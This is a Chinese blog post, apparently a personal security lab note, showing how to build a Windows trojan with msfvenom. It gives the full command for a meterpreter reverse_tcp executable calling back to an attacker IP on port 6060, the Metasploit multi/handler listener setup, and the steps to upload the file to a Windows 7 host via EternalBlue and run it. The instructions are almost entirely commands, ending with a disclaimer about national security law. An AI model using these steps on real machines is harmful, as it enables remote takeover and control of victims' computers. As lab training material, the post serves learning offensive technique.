网络安全Day02笔记

PC端恶意程序利用

制作WIndows恶意软件获取shell

msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品,是用来生成后门的软件

实验内容

制作Win恶意软件
msfvenom的shell在windows中的使用msfvenom生成shell.exe
前置命令 切换到root用户,确保权限最大
sudo passwd root
su root

步骤一:制作并且输出恶意软件

命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.163.129(攻击机的IP)
LPORT=6060 -f exe >allen.exe(名字自己取)

-p 添加载荷payload。
-f 输出文件格式
在这里插入图片描述

步骤2

启动msf
msfconsole
在这里插入图片描述

步骤3

metasploit设置侦听
use exploit/multi/handler #加载模块
msf exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp
#设置payload
msf exploit(multi/handler) > set lhost kali的ip #设置kali的IP
msf exploit(multi/handler) > set lport 6060 #设置kali的端口lport =6060
msf exploit (multi/handler) > exploit 或者 run -j #执行

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

接着把木马文件上传到win7

可以用永恒之蓝漏洞上传到win7(步骤见day01)
命令:
upload allen.exe c://

在这里插入图片描述

点击win7的allen程序
在这里插入图片描述

ps 查看端口
在这里插入图片描述

可能问题

meterpreter died
原因攻击载荷不对
在这里插入图片描述

最后打开win7任务管理器查看allen.exe程序,已经存在了
在这里插入图片描述

注:本文内容仅为个人技术实验分享,请谨记国家安全法。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

isolater-徐熠明

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值